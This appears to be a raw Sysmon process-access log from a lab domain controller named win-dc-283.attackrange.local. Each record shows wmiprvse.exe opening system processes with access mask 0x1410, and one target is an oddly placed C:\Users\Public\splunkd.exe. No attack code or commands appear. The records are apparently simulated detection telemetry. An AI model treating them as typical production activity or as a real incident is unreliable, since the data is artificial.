16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 